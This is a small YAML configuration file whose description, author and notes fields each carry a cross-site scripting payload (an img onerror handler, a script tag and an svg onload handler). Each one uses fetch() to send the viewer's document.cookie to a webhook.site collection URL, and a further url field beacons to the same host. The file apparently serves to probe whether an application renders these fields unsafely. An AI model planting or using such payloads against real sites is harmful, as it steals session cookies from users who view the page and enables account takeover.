name: test-config
description: "<img src=x onerror=\"fetch('https://https://webhook.site/9b278ba7-478e-4d91-aeac-e4207fa53293/yaml-desc?c='+document.cookie)\">"
url: "https://https://webhook.site/9b278ba7-478e-4d91-aeac-e4207fa53293/beacon/yaml-url"
metadata:
  author: "<script>fetch('https://https://webhook.site/9b278ba7-478e-4d91-aeac-e4207fa53293/yaml-author?c='+document.cookie)</script>"
  notes: |
    <svg onload="fetch('https://https://webhook.site/9b278ba7-478e-4d91-aeac-e4207fa53293/yaml-notes?c='+document.cookie)">
